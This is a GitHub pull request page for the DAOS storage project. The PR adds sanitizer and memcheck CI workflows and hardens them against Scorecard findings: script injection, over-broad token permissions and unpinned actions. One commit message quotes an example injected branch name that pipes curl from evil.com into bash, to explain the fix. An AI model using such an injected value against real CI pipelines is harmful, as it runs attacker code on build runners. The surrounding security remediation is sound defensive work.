DAOS-18626 cq: ASAN Men check with GitHub Action#18557

Draft
knard38 wants to merge 1 commit into ckochhof/dev/master/daos-18826/patch-001 from ckochhof/dev/master/daos-18626/patch-001
Conversation

@knard38 knard38 commented Jun 26, 2026

Contributor

TODO

Steps for the author:

  • Commit message follows the guidelines.
  • Appropriate Features or Test-tag pragmas were used.
  • Appropriate Functional Test Stages were run.
  • At least two positive code reviews including at least one code owner from each category referenced in the PR.
  • Testing is complete. If necessary, forced-landing label added and a reason added in a comment.

After all prior steps are complete:

  • Gatekeeper requested (daos-gatekeeper added as a reviewer).

@knard38 knard38 self-assigned this Jun 26, 2026
@github-actions


Ticket title is 'ASAN Men check with GitHub Action'
Status is 'In Progress'
https://daosio.atlassian.net/browse/DAOS-18626

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 49ca01a to 513c51b Compare June 26, 2026 14:13
@knard38 knard38 changed the base branch from master to ckochhof/dev/master/daos-18826/patch-001 June 26, 2026 14:14
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 513c51b to 9ca93b1 Compare June 26, 2026 18:44
@github-advanced-security


You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool.

What Enabling Code Scanning Means:

  • The 'Security' tab will display more code scanning analysis results (e.g., for the default branch).
  • Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results.
  • You will be able to see the analysis results for the pull request's branch on this overview once the scans have completed and the checks have passed.

For more information about GitHub Code Scanning, check out the documentation.

@daosbuild3

Collaborator

Test stage Functional Hardware Large MD on SSD completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/12/execution/node/1330/log

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 9bb48e6 to 1929d2b Compare June 29, 2026 07:30
knard38 pushed a commit that referenced this pull request Jun 29, 2026
Fixes three issues flagged by GitHub Scorecard on PR #18557:

1. [CRITICAL score=0] Dangerous-Workflow: script injection in memcheck.yml
   The 'Resolve SARIF ref and SHA' step interpolated GitHub context values
   (${{ github.event.pull_request.head.ref }}, etc.) directly into a
   bash run: block. A PR branch name containing shell metacharacters
   (e.g. 'main"; curl evil.com|bash; echo') would execute arbitrary code.
   Fix: pass all context values through an env: block and reference them
   as ${ENV_VAR} in the shell, following GitHub's recommended remediation.

2+3. [WARNING score=7] Token-Permissions: top-level permissions in tsan.yml
   security-events: write and checks: write were set at the workflow
   top level. Best practice is to set permissions at the job level so
   that only the specific job that needs them receives elevated access.
   Fix: remove the top-level permissions block from tsan.yml and add
   a permissions: section directly under the build-daos_tsan job.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
knard38 pushed a commit that referenced this pull request Jun 29, 2026
Fixes three open Scorecard findings from PR #18557:

1. Pinned-Dependencies (score=3): codeql-action/upload-sarif@v4 is a
   floating tag. Scorecard requires actions to be pinned by full commit
   SHA to prevent supply-chain attacks.
   Fix: replace @v4 with @8aad20d150bbac5944a9f9d289da16a4b0d87c1e
   (v4.36.2) in both memcheck.yml (2 occurrences) and tsan.yml (1).
   This SHA is already used by other workflows in the repository.

2. Token-Permissions (score=8): no top-level permission defined in
   tsan.yml after we moved permissions to job-level. Scorecard requires
   an explicit top-level permissions block so any future job added to
   the workflow gets the minimum access (read-only) by default.
   Fix: add 'permissions: {}' at workflow top-level in tsan.yml.

Note: Token-Permissions score=8 for 'jobLevel checks: write' in
tsan.yml (finding 3490170495) is expected and accepted — this
permission is required by the action-junit-report action to post test
result checks, and the same pattern is used without issue in memcheck.yml.

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
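The remediations the two commit messages above describe (env: indirection for the 'Resolve SARIF ref and SHA' step, an empty workflow-level permissions block with scopes granted per job, and upload-sarif pinned by full commit SHA), combined in one added illustrative workflow; it is not the PR's own memcheck.yml or tsan.yml, and the workflow name, job name, env variable names and SARIF file path are assumptions.

```yaml
# Added illustrative workflow, not the PR's memcheck.yml or tsan.yml;
# names other than 'Resolve SARIF ref and SHA' and the SARIF path are assumed.
name: memcheck-example
on:
  pull_request:
  push:
    branches: [master]
# Explicit empty workflow-level block: a job added later starts with no
# token permissions unless it declares its own.
permissions: {}
jobs:
  memcheck:
    runs-on: ubuntu-latest
    # Elevated scopes only on the job that needs them.
    permissions:
      contents: read          # checkout needs this once the top level is {}
      security-events: write  # upload-sarif
      checks: write           # posting test-result checks
    steps:
      - uses: actions/checkout@v4   # pin by full SHA as well in practice
      # BEFORE (script injection): ${{ ... }} is substituted into the script
      # text before bash runs, so shell metacharacters in a branch name
      # become part of the command:
      #   run: echo "ref=${{ github.event.pull_request.head.ref }}" >> "$GITHUB_OUTPUT"
      # AFTER: the values enter through env: and are read as ordinary shell
      # variables, which bash never re-parses as code.
      - name: Resolve SARIF ref and SHA
        id: sarif
        env:
          PR_HEAD_REF: ${{ github.event.pull_request.head.ref }}
          PR_HEAD_SHA: ${{ github.event.pull_request.head.sha }}
          GH_REF: ${{ github.ref }}
          GH_SHA: ${{ github.sha }}
        run: |
          if [ -n "${PR_HEAD_REF}" ]; then
            ref="refs/heads/${PR_HEAD_REF}"; sha="${PR_HEAD_SHA}"
          else
            ref="${GH_REF}"; sha="${GH_SHA}"
          fi
          echo "ref=${ref}" >> "$GITHUB_OUTPUT"
          echo "sha=${sha}" >> "$GITHUB_OUTPUT"
      # Pinned by full commit SHA (v4.36.2), as in the second commit above.
      - uses: github/codeql-action/upload-sarif@8aad20d150bbac5944a9f9d289da16a4b0d87c1e
        with:
          sarif_file: results.sarif
          ref: ${{ steps.sarif.outputs.ref }}
          sha: ${{ steps.sarif.outputs.sha }}
```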
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch 2 times, most recently from 6e5ef4b to 98995d5 Compare June 29, 2026 13:45
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 7dfbd60 to f798de2 Compare June 30, 2026 14:12
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 0fe6c20 to 678e4a0 Compare June 30, 2026 15:28
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 678e4a0 to 08e21c2 Compare June 30, 2026 15:38
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 08e21c2 to 3012815 Compare July 1, 2026 07:40
@daosbuild3

Collaborator

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/50/testReport/

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 3012815 to 29af6c0 Compare July 1, 2026 09:33
@@ -0,0 +1,268 @@
# SPDX-License-Identifier: BSD-2-Clause-Patent
artifact_name: 'test-results-unit'
check_name: 'Unit Testing'
permissions:
checks: write
artifact_name: 'test-results-asan'
check_name: 'Unit Test Results (ASan build)'
permissions:
security-events: write
check_name: 'Unit Test Results (ASan build)'
permissions:
security-events: write
checks: write
artifact_name: 'test-results-tsan'
check_name: 'Unit Test Results (TSan build)'
permissions:
security-events: write
check_name: 'Unit Test Results (TSan build)'
permissions:
security-events: write
checks: write
artifact_name: 'test-results-ubsan'
check_name: 'Unit Test Results (UBSan build)'
permissions:
security-events: write
check_name: 'Unit Test Results (UBSan build)'
permissions:
security-events: write
checks: write
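Review bot: the `permissions:` blocks in this hunk grant only `security-events: write` and/or `checks: write`, and no `contents: read` appears in the extracted lines; with the explicit `permissions: {}` at workflow level that the second commit message above introduces, any job in this file that checks out the repository needs `contents: read` declared on the job, so please confirm it is present in the lines not shown here. Each sanitizer `check_name` also appears twice with different scopes, once with `security-events: write` alone and once with `checks: write` added; a one-line comment beside each pair stating which job uploads SARIF and which posts the JUnit check would make the split easy to audit against the Scorecard findings.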
@daosbuild3

Collaborator

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/51/testReport/

@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 5582f20 to 1cd88d5 Compare July 1, 2026 12:37
@daosbuild3

Collaborator

Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/55/testReport/

…caffold

TODO

Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
@knard38 knard38 force-pushed the ckochhof/dev/master/daos-18626/patch-001 branch from 1cd88d5 to 3036055 Compare July 1, 2026 13:55